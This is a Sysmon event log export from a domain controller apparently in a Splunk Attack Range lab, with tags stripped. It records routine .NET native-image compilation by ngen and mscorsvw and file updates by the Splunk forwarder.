21:01:11.748{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A117-60D3-6F02-00000000CF01}6768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018813Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:11.685{4DB9351A-A117-60D3-6E02-00000000CF01}6528NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZO7T9PAIOP\System.IdentityModel.Selectors.ni.dll.auxMD5=680522C65915FDF66DB847EF6302A49D,SHA256=CEBE8F735B000BA8FB3C3BB0504CDF928926EB2215144F1B20AD4734073F2E17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018812Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:11.685{4DB9351A-A117-60D3-6E02-00000000CF01}6528NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZO7T9PAIOP\System.IdentityModel.Selectors.ni.dllMD5=7EACED69AC81CB1F4E3FA510A32FA803,SHA256=0C4E0B80295320F20F278D3DC28C4BE907390706EA77F47C06B1B8473B84911D,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018811Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:11.670{4DB9351A-A117-60D3-6E02-00000000CF01}6528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1980-0\System.IdentityModel.Selectors.dll2021-06-23 21:01:11.670 10341000x800000000000000018810Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:11.514{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A117-60D3-6E02-00000000CF01}6528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018809Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:11.514{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A117-60D3-6E02-00000000CF01}6528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018808Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:11.514{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A117-60D3-6E02-00000000CF01}6528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018807Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:11.467{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66E6691A52A8B2645E58B44D693A2F11,SHA256=921302E3918CE592BE3CC1591831A93E0C43299C089F316EA19D87934DABDA9B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018806Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:11.451{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A117-60D3-6D02-00000000CF01}6340C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018805Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:11.420{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A117-60D3-6D02-00000000CF01}6340C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018804Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:11.420{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A117-60D3-6D02-00000000CF01}6340C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000018803Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:11.264{4DB9351A-A115-60D3-6C02-00000000CF01}3332C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\d04-0\System.IdentityModel.dll2021-06-23 21:01:11.264 10341000x800000000000000018829Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:12.982{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A118-60D3-7202-00000000CF01}6484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018828Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:12.982{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A118-60D3-7202-00000000CF01}6484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018827Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:12.935{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A118-60D3-7102-00000000CF01}6844C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018826Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:12.810{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A118-60D3-7102-00000000CF01}6844C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018825Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:12.810{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A118-60D3-7102-00000000CF01}6844C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018824Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:12.748{4DB9351A-A118-60D3-7002-00000000CF01}2488NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MK72N7MKAF\System.IdentityModel.Services.ni.dll.auxMD5=EC9C6938573CD6D8514C7FC8438E194C,SHA256=35D4B02BEE6A7DE743A6FAB8EB1789C908205A40558485460317CF278EAEC728,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018823Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:12.748{4DB9351A-A118-60D3-7002-00000000CF01}2488NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MK72N7MKAF\System.IdentityModel.Services.ni.dllMD5=896A28ACF0EF806B08D429DBA9278B4A,SHA256=A7070A7EB8BDE8EA912D8A8365AB348B34AF5361B1D7895791A19D8FE3502779,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018822Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:12.732{4DB9351A-A118-60D3-7002-00000000CF01}2488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\9b8-0\System.IdentityModel.Services.dll2021-06-23 21:01:12.732 23542300x800000000000000018821Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:12.482{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FBA36FFFE11D484FE2725311FCD8461,SHA256=8FBC9D3B6C9844348A04A588DF3BF570EB95D66FFDF60E6F1C26A91E71F9F038,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018820Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:12.451{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9165B1BE20FEEE7A9D5C6C638B23FC1C,SHA256=F8E47A1E827215668FAF4C2FAE2210F06550BFE8B04CBFF5E695056DE75D11FC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018819Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:12.248{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A118-60D3-7002-00000000CF01}2488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018818Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:12.232{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A118-60D3-7002-00000000CF01}2488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018817Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:12.232{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A118-60D3-7002-00000000CF01}2488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018858Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:13.951{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A119-60D3-7702-00000000CF01}5368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018857Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:13.935{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A119-60D3-7702-00000000CF01}5368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018856Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:13.935{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A119-60D3-7702-00000000CF01}5368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018855Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:13.920{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3536E67CBB8190F3D69DD783CE2C9A27,SHA256=1C7593A87843C1D388E44F18CBA6AB5F60231167C31370CA2CE4F135A3D652A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018854Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:13.920{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA8D1398813CA59C43A37F2D765D3065,SHA256=83B2B4DD82E99C16E5E5024CFEF135DD2090D55DE115C567F255D2A6CDCFA437,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018853Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:13.889{4DB9351A-A119-60D3-7602-00000000CF01}6560NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\XKJ6YM5P50\System.IO.Log.ni.dll.auxMD5=CE65A2402E061BB0465D2243764EFE2C,SHA256=0D93BFCF26F7D342E7B5C13A107999A710E6D5368AA70F451D024220670459A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018852Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:13.873{4DB9351A-A119-60D3-7602-00000000CF01}6560NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\XKJ6YM5P50\System.IO.Log.ni.dllMD5=BDAAB6BC4AE780AD58A6E2B386E2D3E0,SHA256=418B6BBB4FA6584A301392357020DB41F0A80451463ABD6DECACE994766D9C54,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018851Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:13.857{4DB9351A-A119-60D3-7602-00000000CF01}6560C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\19a0-0\System.IO.Log.dll2021-06-23 21:01:13.857 354300x800000000000000018850Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:12.238{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 